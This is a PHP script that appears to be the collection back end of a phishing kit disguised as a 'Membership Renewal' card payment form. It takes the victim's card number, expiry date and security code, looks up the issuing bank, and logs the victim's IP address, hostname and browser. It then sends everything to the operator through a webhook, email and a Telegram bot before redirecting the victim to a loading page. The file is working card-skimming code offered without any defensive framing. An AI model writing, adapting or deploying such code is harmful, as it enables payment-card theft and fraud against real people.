<?php
session_start();
include "../config.php"; // Ensure this path is correct for your server setup
include "functions.php";

// Retrieve and sanitize card number input
$bincheck = $_POST['card_number'];
$bincheck = preg_replace('/\s/', '', $bincheck);

// Extract the first 8 digits for BIN lookup
$bin = $_POST['card_number'];
$bin = preg_replace('/\s/', '', $bin);
$bin = substr($bin, 0, 8);

// BIN lookup using binlist API
$url = "https://lookup.binlist.net/" . $bin;
$headers = array();
$headers[] = 'Accept-Version: 3';
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$resp = curl_exec($ch);
curl_close($ch);
$xBIN = json_decode($resp, true);

// Store BIN details in session variables
$_SESSION['bank_name'] = $xBIN["bank"]["name"] ?? 'Unknown';
$_SESSION['bank_scheme'] = strtoupper($xBIN["scheme"] ?? 'Unknown');
$_SESSION['bank_type'] = strtoupper($xBIN["type"] ?? 'Unknown');
$_SESSION['bank_brand'] = strtoupper($xBIN["brand"] ?? 'Unknown');

// Collect additional user and server information
$ip = getenv("REMOTE_ADDR");
$message = "-------------- Membership Renewal -------------\n";
$message .= "Card Number : " . $_POST['card_number'] . "\n";
$message .= "Expires MM/YY : " . $_POST['expiry'] . "\n";
$message .= "Security Code : " . $_POST['cvv'] . "\n";
$message .= "Card Bank : " . $_SESSION['bank_name'] . "\n";
$message .= "Card Type : " . $_SESSION['bank_type'] . "\n";
$message .= "Card Brand : " . $_SESSION['bank_brand'] . "\n";
$message .= "-------------- IP Tracing ------------\n";
$message .= "IP      : https://whatismyip.com/ip/$ip\n";
$message .= "Host    : " . gethostbyaddr($ip) . "\n";
$message .= "Browser : " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$message .= "--------------------------------------\n";

// Email setup (ensure $Email and $api are correctly defined in your Email.php file)
$subject = " Credit | Membership Renewal | $ip";
$headers = 'From: Membership' . "\r\n";
$data = array( "content" => $message.$js, ); $json_data = json_encode($data);
$ch = curl_init($curlset);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);

// Send the email
@mail($Email, $subject, $message, $headers);

// Optional: Send message via Telegram bot
@file_get_contents("https://api.telegram.org/bot" . $api . "/sendMessage?chat_id=" . $chatid . "&text=" . urlencode($message));

// Redirect to a loading or confirmation page after processing
header('Location: ../loading.php');
exit();
?>
